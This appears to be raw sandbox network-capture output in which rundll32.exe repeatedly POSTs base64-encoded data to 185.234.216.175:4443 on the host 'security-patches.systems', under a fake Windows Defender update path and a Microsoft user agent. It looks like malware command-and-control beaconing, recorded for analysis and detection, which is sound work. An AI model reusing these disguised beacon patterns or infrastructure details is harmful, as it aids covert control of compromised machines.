Dec 6, 2024 22:13:09.700067997 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:11.289077997 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:10 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49957	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:11.550384998 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:13.131536961 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49960	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:13.394324064 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:15.118576050 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:14 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49965	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:15.466469049 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:16.962388992 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:16 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49971	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:17.230851889 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:18.672746897 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:18 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49976	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:18.927175045 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:20.397366047 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:20 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49979	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:20.660806894 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:22.140784025 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:21 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49984	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:22.414685011 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:23.854160070 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49987	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:24.114236116 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:25.615542889 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:25 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49992	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:25.916804075 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:27.329413891 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:26 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49997	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:27.622530937 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:29.065823078 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:28 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	50000	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:29.339274883 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
